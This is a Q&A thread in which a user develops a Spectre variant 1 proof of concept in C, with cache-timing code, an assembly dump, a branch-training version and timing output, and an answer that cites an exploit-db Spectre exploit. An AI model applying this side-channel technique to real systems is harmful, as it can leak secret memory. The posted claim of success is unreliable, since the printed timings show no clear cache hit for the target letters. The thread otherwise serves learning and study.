0

Trying to load "a" (lowecase a) speculatively using Spectre.

Was hinted here:

Spectre PoC - Paper based - opposite results

that the problem why it does not load speculatively, could be

  • not trained branch
  • compiler optimization

Here is the code:

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




void main(void)
{
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };

uint8_t array2[256 * 512];

for(int i = 0; i < sizeof(array2); i++)
  array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */


for(int i = 0; i < 256; i++)
  _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */



printf("%c is speculatively executed\n",array1[103]);



int dummy = 0;
for(int i=0; i<104; i++) {
 if (i != 103) {
    array2[array1[i] * 512] = array1[i]; 
 }
}



int t0,time_taken = 0;
int junk = 0;

int mix_i=0;

 int i,j;
    int aux,res;

    char RandomId[28];
    char ListId[28]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49};



    srand(time(NULL));

    for(i=0; i<28; i++)
    {
        res = rand() % 28;
        aux = ListId[res];

        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }



volatile uint8_t * addr;
int y=0;


  for(int i=0; i<28; i++)
  {
    mix_i = RandomId[i];
    addr = &array2[mix_i * 512];
    t0 = __rdtscp(&junk); 
    junk = *addr;
    time_taken = __rdtscp(&junk) - t0;
    if(mix_i>=49 && mix_i<=97)
      if(mix_i==49)
        printf("%c is not cached\n",mix_i); 
      printf("trying: %c time: %i\n",mix_i,time_taken);
  }
}

I think, hope that compiler optimization is not the problem.

2 Questions:

  1. How can I check if compiler optimized it?
  2. How can I train the branch?

Can somebody explain the second on this or simple example (with code sample, gdb outputs?)

Thanks,

Update 1:

Compiled the sensitive fragment (for loop).

user@laptop:~/labspectre$ cat test.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>


void main(void)
{
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };

uint8_t array2[256 * 512];


int dummy = 0;
for(int i=0; i<104; i++) {
 if (i != 103) {
    array2[array1[i] * 512] = array1[i];
 }
}
}

Here is the asm dump:

user@laptop:~/labspectre$ cat test.s
    .file   "test.c"
    .text
    .globl  main
    .type   main, @function
main:
.LFB2:
    .cfi_startproc
    pushq   %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq    %rsp, %rbp
    .cfi_def_cfa_register 6
    subq    $131328, %rsp
    movq    %fs:40, %rax
    movq    %rax, -8(%rbp)
    xorl    %eax, %eax
    movb    $65, -131200(%rbp)
    movb    $66, -131199(%rbp)
    movb    $67, -131198(%rbp)
    movb    $68, -131197(%rbp)
    movb    $69, -131196(%rbp)
    movb    $70, -131195(%rbp)
    movb    $71, -131194(%rbp)
    movb    $72, -131193(%rbp)
    movb    $73, -131192(%rbp)
    movb    $74, -131191(%rbp)
    movb    $75, -131190(%rbp)
    movb    $76, -131189(%rbp)
    movb    $77, -131188(%rbp)
    movb    $78, -131187(%rbp)
    movb    $79, -131186(%rbp)
    movb    $80, -131185(%rbp)
    movb    $81, -131184(%rbp)
    movb    $82, -131183(%rbp)
    movb    $83, -131182(%rbp)
    movb    $84, -131181(%rbp)
    movb    $85, -131180(%rbp)
    movb    $86, -131179(%rbp)
    movb    $87, -131178(%rbp)
    movb    $88, -131177(%rbp)
    movb    $89, -131176(%rbp)
    movb    $90, -131175(%rbp)
    movb    $65, -131174(%rbp)
    movb    $66, -131173(%rbp)
    movb    $67, -131172(%rbp)
    movb    $68, -131171(%rbp)
    movb    $69, -131170(%rbp)
    movb    $70, -131169(%rbp)
    movb    $71, -131168(%rbp)
    movb    $72, -131167(%rbp)
    movb    $73, -131166(%rbp)
    movb    $74, -131165(%rbp)
    movb    $75, -131164(%rbp)
    movb    $76, -131163(%rbp)
    movb    $77, -131162(%rbp)
    movb    $78, -131161(%rbp)
    movb    $79, -131160(%rbp)
    movb    $80, -131159(%rbp)
    movb    $81, -131158(%rbp)
    movb    $82, -131157(%rbp)
    movb    $83, -131156(%rbp)
    movb    $84, -131155(%rbp)
    movb    $85, -131154(%rbp)
    movb    $86, -131153(%rbp)
    movb    $87, -131152(%rbp)
    movb    $88, -131151(%rbp)
    movb    $89, -131150(%rbp)
    movb    $90, -131149(%rbp)
    movb    $65, -131148(%rbp)
    movb    $66, -131147(%rbp)
    movb    $67, -131146(%rbp)
    movb    $68, -131145(%rbp)
    movb    $69, -131144(%rbp)
    movb    $70, -131143(%rbp)
    movb    $71, -131142(%rbp)
    movb    $72, -131141(%rbp)
    movb    $73, -131140(%rbp)
    movb    $74, -131139(%rbp)
    movb    $75, -131138(%rbp)
    movb    $76, -131137(%rbp)
    movb    $77, -131136(%rbp)
    movb    $78, -131135(%rbp)
    movb    $79, -131134(%rbp)
    movb    $80, -131133(%rbp)
    movb    $81, -131132(%rbp)
    movb    $82, -131131(%rbp)
    movb    $83, -131130(%rbp)
    movb    $84, -131129(%rbp)
    movb    $85, -131128(%rbp)
    movb    $86, -131127(%rbp)
    movb    $87, -131126(%rbp)
    movb    $88, -131125(%rbp)
    movb    $89, -131124(%rbp)
    movb    $90, -131123(%rbp)
    movb    $65, -131122(%rbp)
    movb    $66, -131121(%rbp)
    movb    $67, -131120(%rbp)
    movb    $68, -131119(%rbp)
    movb    $69, -131118(%rbp)
    movb    $70, -131117(%rbp)
    movb    $71, -131116(%rbp)
    movb    $72, -131115(%rbp)
    movb    $73, -131114(%rbp)
    movb    $74, -131113(%rbp)
    movb    $75, -131112(%rbp)
    movb    $76, -131111(%rbp)
    movb    $77, -131110(%rbp)
    movb    $78, -131109(%rbp)
    movb    $79, -131108(%rbp)
    movb    $80, -131107(%rbp)
    movb    $81, -131106(%rbp)
    movb    $82, -131105(%rbp)
    movb    $83, -131104(%rbp)
    movb    $84, -131103(%rbp)
    movb    $85, -131102(%rbp)
    movb    $86, -131101(%rbp)
    movb    $87, -131100(%rbp)
    movb    $88, -131099(%rbp)
    movb    $89, -131098(%rbp)
    movb    $97, -131097(%rbp)
    movq    -131200(%rbp), %rax
    movq    %rax, -131312(%rbp)
    movq    -131192(%rbp), %rax
    movq    %rax, -131304(%rbp)
    movq    -131184(%rbp), %rax
    movq    %rax, -131296(%rbp)
    movq    -131176(%rbp), %rax
    movq    %rax, -131288(%rbp)
    movq    -131168(%rbp), %rax
    movq    %rax, -131280(%rbp)
    movq    -131160(%rbp), %rax
    movq    %rax, -131272(%rbp)
    movq    -131152(%rbp), %rax
    movq    %rax, -131264(%rbp)
    movq    -131144(%rbp), %rax
    movq    %rax, -131256(%rbp)
    movq    -131136(%rbp), %rax
    movq    %rax, -131248(%rbp)
    movq    -131128(%rbp), %rax
    movq    %rax, -131240(%rbp)
    movq    -131120(%rbp), %rax
    movq    %rax, -131232(%rbp)
    movq    -131112(%rbp), %rax
    movq    %rax, -131224(%rbp)
    movq    -131104(%rbp), %rax
    movq    %rax, -131216(%rbp)
    movl    $0, -131316(%rbp)
    movl    $0, -131320(%rbp)
    jmp .L2
.L4:
    cmpl    $103, -131320(%rbp)
    je  .L3
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %eax
    movzbl  %al, %eax
    sall    $9, %eax
    movl    %eax, %ecx
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %edx
    movslq  %ecx, %rax
    movb    %dl, -131088(%rbp,%rax)
.L3:
    addl    $1, -131320(%rbp)
.L2:
    cmpl    $103, -131320(%rbp)
    jle .L4
    nop
    movq    -8(%rbp), %rax
    xorq    %fs:40, %rax
    je  .L5
    call    __stack_chk_fail
.L5:
    leave
    .cfi_def_cfa 7, 8
    ret
    .cfi_endproc
.LFE2:
    .size   main, .-main
    .ident  "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.5) 5.4.0 20160609"
    .section    .note.GNU-stack,"",@progbits
user@laptop:~/labspectre$

To me it looks good. I see loading of the array and than:

cmpl    $103, -131320(%rbp)
        je  .L3

Check for value of 103 in the loop.

So it is NOT optimized? Right?

Update 3:

OK this time I think it works. I load "a" and "b" speculatively. As you can see they're are not loaded in the Code.

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




void main(void)
{
    //array of chars A-Z and "a" and "b" at the end
    volatile uint8_t array1[105] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97,98 };

    uint8_t array2[256 * 512];

    for(int i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */


    for(int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */



    printf("%c and %c are speculatively executed/loaded\n",array1[103],array1[104]);

    srand(time(NULL));


    unsigned int array1_size = 16;
    int r,j = 0;

    r = rand();


    int tries = 0;
    size_t training_x, x;


    size_t malicious_x=r;
    //printf("malicious_x: %i\n",malicious_x);

    for (tries = 999; tries > 0; tries--) {

        training_x = tries % array1_size; 

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        for (j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */

            //printf("x: %i\n",x);         
            int dummy = 0;
            for(int i=0; i<105; i++) {
                //array[103] which is "a" will be loaded speculatively, as well as array[104]
                if (x<103) {
                    array2[array1[i] * 512] = array1[i]; 
                }
            }

        }

    }



    int t0,time_taken = 0;
    int junk = 0;

    int mix_i=0;

    int i;
    int aux,res;

    char RandomId[29];
    char ListId[29]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49,98};




    for(i=0; i<29; i++)
    {
        res = rand() % 29;
        aux = ListId[res];

        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }



    volatile uint8_t * addr;
    int y=0;


    for(int i=0; i<29; i++)
    {
        mix_i = RandomId[i];
        addr = &array2[mix_i * 512];
        t0 = __rdtscp(&junk); 
        junk = *addr;
        time_taken = __rdtscp(&junk) - t0;
        if(mix_i>=49 && mix_i<=98)
            if(mix_i==49)
                printf("%c is not cached\n",mix_i); 
        printf("trying: %c time: %i\n",mix_i,time_taken);
    }
}

Execution:

user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: P time: 96
trying: Y time: 92
trying: N time: 93
trying: A time: 118
trying: J time: 109
trying: O time: 92
trying: Z time: 92
1 is not cached
trying: 1 time: 316
trying: T time: 92
trying: X time: 93
trying: C time: 93
trying: R time: 92
trying: U time: 92
trying: G time: 92
trying: B time: 93
trying: E time: 93
trying: D time: 94
trying: M time: 93
trying: H time: 92
trying: Q time: 92
trying: V time: 93
trying: a time: 92
trying: b time: 134
trying: I time: 92
trying: L time: 93
trying: S time: 93
trying: W time: 92
trying: F time: 92
trying: K time: 270
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Y time: 96
trying: J time: 219
trying: S time: 121
trying: R time: 92
trying: O time: 93
trying: A time: 113
trying: M time: 95
trying: Q time: 95
trying: U time: 123
trying: I time: 93
trying: N time: 93
trying: Z time: 92
trying: E time: 93
trying: H time: 92
trying: W time: 93
trying: K time: 92
1 is not cached
trying: 1 time: 305
trying: b time: 93
trying: D time: 93
trying: C time: 93
trying: L time: 95
trying: T time: 92
trying: X time: 93
trying: B time: 93
trying: a time: 92
trying: G time: 93
trying: V time: 93
trying: P time: 93
trying: F time: 95
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: W time: 96
trying: L time: 328
trying: I time: 93
1 is not cached
trying: 1 time: 305
trying: T time: 101
trying: G time: 93
trying: b time: 101
trying: E time: 93
trying: H time: 93
trying: F time: 93
trying: O time: 93
trying: C time: 122
trying: Q time: 94
trying: V time: 94
trying: a time: 93
trying: B time: 93
trying: A time: 96
trying: P time: 92
trying: Y time: 97
trying: Z time: 92
trying: S time: 93
trying: N time: 92
trying: U time: 92
trying: K time: 101
trying: J time: 93
trying: X time: 93
trying: M time: 93
trying: R time: 93
trying: D time: 107
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Q time: 941
trying: M time: 109
trying: A time: 101
trying: W time: 122
trying: N time: 93
trying: R time: 133
trying: H time: 94
trying: G time: 93
trying: Z time: 92
trying: B time: 94
trying: O time: 92
trying: C time: 98
trying: Y time: 93
trying: D time: 93
trying: F time: 92
trying: U time: 93
trying: P time: 95
trying: V time: 93
trying: S time: 93
trying: b time: 101
trying: T time: 92
trying: X time: 94
trying: I time: 93
trying: L time: 93
trying: E time: 92
trying: K time: 92
1 is not cached
trying: 1 time: 288
trying: a time: 92
trying: J time: 93

Cached values are ca 90 cycles, not cached ca 300 cycles.

dev
  • 937
  • 1
  • 8
  • 23

1 Answers1

1

How can I check if compiler optimized it?

Compile to assembly. For GCC this is the "-S" flag. Then compare the assembly to the code - you do of-course need to understand how to read assembly.

How can I train the branch?

See line 59 of the example exploit- https://www.exploit-db.com/exploits/43427/

You perform the action lots of times with a value that results in the branch being taken. Then you move to the value that doesn't result in it in a way that isn't "obvious" to the processor.

Hector
  • 10,893
  • 3
  • 41
  • 44
  • Thanks. Regarding Optimization, can you confirm my suspection that it is NOT optimized. More in Update 1: – dev Jan 18 '18 at 13:58
  • It does not look optimised out no. I imagine the if / jumps let the processor know its coming up so the branch predictor makes the correct decision. – Hector Jan 18 '18 at 14:19
  • Yea, I was looking at the exploit you referenced. I guess my approach is wrong since I make a very obvious check in the "if" in the loop. In the exploit there is a function taking parameter .... Do you agree that in the loop the way I have it now it seems impossible to execute code speculatively? – dev Jan 18 '18 at 14:22
  • @android_dev = its the same one you referenced in your original question! As your code stands its technically possible but on a modern processor extremely unlikely. Were you to use an older CPU with a more basic branch predictor it could work - but it wouldn't be of any use other than PoC because you aren't doing anything to retrieve the value out of it. – Hector Jan 18 '18 at 14:24
  • THANKS for your help during this Spectre Exploitation journey! Well I think this code should, if this would work, as you stated, speculatively read "a" (at the end of the array array1). I should see it, since "a" should have low time access value, and than I try to load also value referenced by '1' index (decimal 49) which should have high value. Which I understand would prove that "a" was loaded speculatively. – dev Jan 18 '18 at 14:36
  • FYI OK I think I got the PoC running. Did the training as in the exploit from the Spectre paper. See Update 3: if you are interested. – dev Jan 18 '18 at 21:20